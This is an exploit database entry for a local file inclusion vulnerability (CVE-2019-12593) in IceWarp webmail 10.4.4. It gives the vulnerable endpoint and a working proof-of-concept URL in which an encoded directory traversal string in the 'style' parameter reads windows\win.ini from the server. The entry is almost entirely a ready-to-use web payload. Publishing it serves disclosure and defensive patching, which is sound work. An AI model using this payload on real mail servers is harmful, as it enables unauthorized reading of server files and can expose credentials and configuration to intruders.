id: 32837
date: 06/05/2019
title: IceWarp 10.4.4 - Local File Inclusion Vulnerability
author: JameelNabbo
cves: CVE-2019-12593

# Exploit Title: IceWarp <=10.4.4 local file include
# Exploit Author: JameelNabbo
# Website: uitsec.com
# Vendor Homepage: http://www.icewarp.com
# Software Link: https://www.icewarp.com/downloads/trial/
# Version: 10.4.4
# Tested on: Windows 10
# CVE: CVE-2019-12593
POC:

http://example.com/webmail/calendar/minimizer/index.php?style=[LFI]

Example:
http://example.com/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini

#  0day.today [2023-03-22]  #